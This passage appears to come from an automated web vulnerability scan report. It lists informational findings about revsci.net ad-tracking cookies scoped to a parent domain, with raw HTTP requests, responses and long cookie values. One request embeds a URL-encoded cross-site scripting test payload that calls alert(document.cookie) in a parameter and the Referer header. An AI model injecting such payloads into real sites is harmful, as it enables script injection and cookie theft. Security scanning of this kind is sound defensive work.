SNCjx3VKQ82gqES+uLicq8VrbcQZ8bZUFsiEyYTxlZ+fS6/EYnLjJ9Bk6LAgUDFoLFqGEFdxm9qf31Gqq6yE+3FP0sXUhv9CTG9Qao3c6D69SN73qQ3I+LREv/fxXOnYd5NAs+zwVcmF/PHUAgKmZMsxjhKOlt4kOsS+FetbxfaCgkZcpZ4P36eyny+I4yUu0lDINI8+eBDvAUCY3h2n89Pz1nhuWK7Q534Q7w=="; rsi_segs_1000000=pUPF4k+huQIMTzaxu2F29/z4Oss1gLZjSjagIGaQsDQ0ubO+NOVEpsZ5SuHqPlIcMQ/cvW9sjK6kuhf/9/9LK4/QiglY+E82qMXfc3Ur2YqYJhOnBRiAEKgmFzpRHtByzn85kSJ3FJXnfM7lp1rXGCAtCyOsR0o5AYgxZF27q6KHXshH7QqMZKdejkvRZ42rwWRuZM9/g+5Y1Fedrb8/4hiG6CEgOBsTzrivcBIXPvyJIWSEnVJqZN2dbyw4AVwVnd79qBwWxClGFSA7EPpoWFUyrGAgnlP9nHw+bGguQONFa7zaeQqaoxjGW/n7mlbbwbn3EpryAM4DI0loQRa1M9uuyQpCdmNjbassDtKeOxr4j10dwJi3e7kQyLCxhnM98vGppIJcV/1xTArabMmn9Q/NioL0UwPsaEBDRzIBkdVS27X3SpHBynn9Lth9scS7+7Sf2rTVAH8Qm5yWCD7PIVS6BMCQakVNSLgBnLGWQ3EUGQqdtffxhOx3+nKHDCXakKeee/0HkEQpSacKo9d4d/UbGL3ch/77+cH0XVW0EQ+J3+r4Zkekrnm87zIWxHGIvE/V3rDl/u9J/aNp99A7c4GrTN8AfujlwYFgQSI0Zxq7+0lqsGjuFnJrfRuPVVnLhtFdwY7fBMy223+pwSiZtr4MRLaWwRy02yFclTQGPJSlSD+cca1gXssx6awAJyrNxNYWHIpL82TdWbX3ZArSTcjQUPffoUI1DCdGzsTNb+f0s9CNbD5itVp9yELWTzU8jDFC3FONc2DuDBtNkqhqYbDd3VoV8lrNbw==; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rtc_vdh9=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_vdh9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4kOheAIMDjaxq2F29zEFqICTC+braGYRkX2ILzU0ubO+NO1EpsZ5SuHqPlIcMQ/0lXam/+piUhfp6MYDi5Ltmb3W/u0nGlRZLTdLeKuvFLJgwTUBQGmkGThl5pam9X0SDfBM1hv0IyFY0OJlD25LZxlv9giU9jzd4cBIDZmhH54Gojd6/jUtx5FZUgM0a+E9ZSdZZI5yoFedrb8//hiG6CEgOEMFcjoIeueUCxtkaeQDfr1Ybo11k8JXewFWXjFkF7Clb5Fbawer1yrgahjjsBaE5ImfVwFDpu70tLiWFMA3kByEjqxkCdipzMTXYEaeZJ6BgxzRBIFTNqAqAzi/oX38PIZd66GdRlw8ucpDQxfmw6gdlHEU9znYrpDT4IHGwFrIVJvCqMoVFODAapUufdY9wfxryj4I4tUp6M1QwerLGSqWdi/5zP8Tczymm7yXUan3PBm+/v+pJydx2y4M/bpTik+dJkknw763IQz49m9/lp1xnGhB4rBJAilJb7rRfb1QpgqVkYr0LKAmIEnp+MOPBdEoEOQtUtl9mNyfeZ0o0vJ3TMg+0ybtwr5WKuG4CyJaerSWqG6+zaw3jmwxR63lfJqcBVOtpwnNvfz/fCFZe8ylIa/BMzgeHRC6dvYmU4reagzBAkh4i5kSxtwbOhcV3Cy1XGJAht5G1Q2bdyaxqHaj4Oa2P8csqTtEL8sW1qo1xQfNlI5qOPJGGlpX0zHyHPmhpn/MmF2MU2O1Wl3oRKRA1mGN/u2wrZ8lnqzpMHmMYzTXfJOZcCFpZWp5amWwhA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
Set-Cookie: rtc_WdNx=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:15:55 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

13.58. http://pix04.revsci.net/H07707/b3/0/3/0806180/215595401.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/215595401.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNOsPC7nMUV/0bee4znL85ahvsdqPJYmPBzmH54bBx8TYNCTYObQM7enbGl6Gwz9X2lHanrF8ryjbBfhMfqjV5MpzMugEJZgqS0tRA2BY0s54Y2J3S3lZSvIJkGEakbmX73O1EdOqxfU0TWt1Dk0Jjyr11LP+EJVZ5w+avJuoz43fhFun61TlfbkhVuzsZRCINtd3vk9VxrtK2FH07+6wdxbc=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:08 GMT; Path=/
rtc_C-P4=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E/r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHpsPH8; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:08 GMT; Path=/
NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:26:08 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/215595401.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topicse7f31%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ed4e86dd7255%252Fmergers-acquisitions%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F0%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4def5b78&0&&4dc8e6f8&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPNO0PF7gMQVo3R0NZJg79YWbhtcLLpBazl7mCqBpJarUW6jPV05T7tFxeDoj+1mls+pOPn4ipzReXtum8R6jVtceHfrOuuqM2RcyTARJCEBc2AEzH/3rVr/bLlN4saPMzjzgpVEetFZXp28KRvklS6CFf3iQEw3MnGhmr3G+nQbqUTDdvbvIGcFvcpsUfPj9jgHCvfBxqbUa1Pxs9qwlw=; rtc_ZiPR=MLuBm66ht4kSQA8cBQ63qpGzJe3015EFoD/9+BePfOPTKz1c+FLu1HY/qEVNhdJoj3Ynh8QtjksD7b0sBwtockByJhdI9tRqS4QHbWUMBbKZcTloFE/12EhX1Y8FdZW0OoeT+bs7ZxYnIRtoNAe/Ig3QE2yQL3rmaqXa1/vP9Hx4RKmtIevWXoON1GUKjBsIYBRgi4j/22m1waaOB9NUUcfRQjKWjWXgexJ+GRSMOAnib1sjZiN0GIokbg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ZiPR=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNOsPC7nMUV/0bee4znL85ahvsdqPJYmPBzmH54bBx8TYNCTYObQM7enbGl6Gwz9X2lHanrF8ryjbBfhMfqjV5MpzMugEJZgqS0tRA2BY0s54Y2J3S3lZSvIJkGEakbmX73O1EdOqxfU0TWt1Dk0Jjyr11LP+EJVZ5w+avJuoz43fhFun61TlfbkhVuzsZRCINtd3vk9VxrtK2FH07+6wdxbc=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:08 GMT; Path=/
Set-Cookie: rtc_C-P4=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E/r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHpsPH8; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:08 GMT; Path=/
Set-Cookie: NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:26:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:26:07 GMT
Content-Length: 849

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_11028','H07707_11029','H07707_11044','H07707_11048'];
var rsiExp=new Date((new Date()).getTime()+2
...[SNIP]...

13.59. http://pix04.revsci.net/H07707/b3/0/3/0806180/225588936.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/225588936.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4k+huQIMTzaxu2F29/z4Oss1gLZjSjagIGaQsDQ0ubO+NOVEpsZ5SuHqPlIcMQ/cvW9sjK6kuhf/9/9LK4/QiglY+E82qMXfc3Ur2YqYJhOnBRiAEKgmFzpRHtByzn85kSJ3FJXnfM7lp1rXGCAtCyOsR0o5AYgxZF27q6KHXshH7QqMZKdejkvRZ42rwWRuZM9/g+5Y1Fedrb8/4hiG6CEgOBsTzrivcBIXPvyJIWSEnVJqZN2dbyw4AVwVnd79qBwWxClGFSA7EPpoWFUyrGAgnlP9nHw+bGguQONFa7zaeQqaoxjGW/n7mlbbwbn3EpryAM4DI0loQRa1M9uuyQpCdmNjbassDtKeOxr4j10dwJi3e7kQyLCxhnM98vGppIJcV/1xTArabMmn9Q/NioL0UwPsaEBDRzIBkdVS27X3SpHBynn9Lth9scS7+7Sf2rTVAH8Qm5yWCD7PIVS6BMCQakVNSLgBnLGWQ3EUGQqdtffxhOx3+nKHDCU4YiJJ5TCeIubAMo6XeYxlR7B2V8OZjayRxIsAp3+KDT0+gk6NRKWjhJhzinsxvDU9BuCz+mxkrV1xbFN+BEZntlRwCUwBPC4ruEgyGonI3UIK2dg3ILUQy7y5xrhpijYJ/DT1qxMzUvMcBv8nc7sRH/CKmOD8YSW2QQKmDLfdKY8G1gXpRr43CyWS/hpU5rlQFkOOKu9K9h/juAyXN0GcZqUeoK7TnIk/LcbQE6VTt2LDG/ywqIQvQAV5W+cXjrFsqPExS4ZLgWR48xAOOvd8cR3ICGUpaUXNYQ==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:04:17 GMT; Path=/
rtc_l-Qz=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:04:17 GMT; Path=/
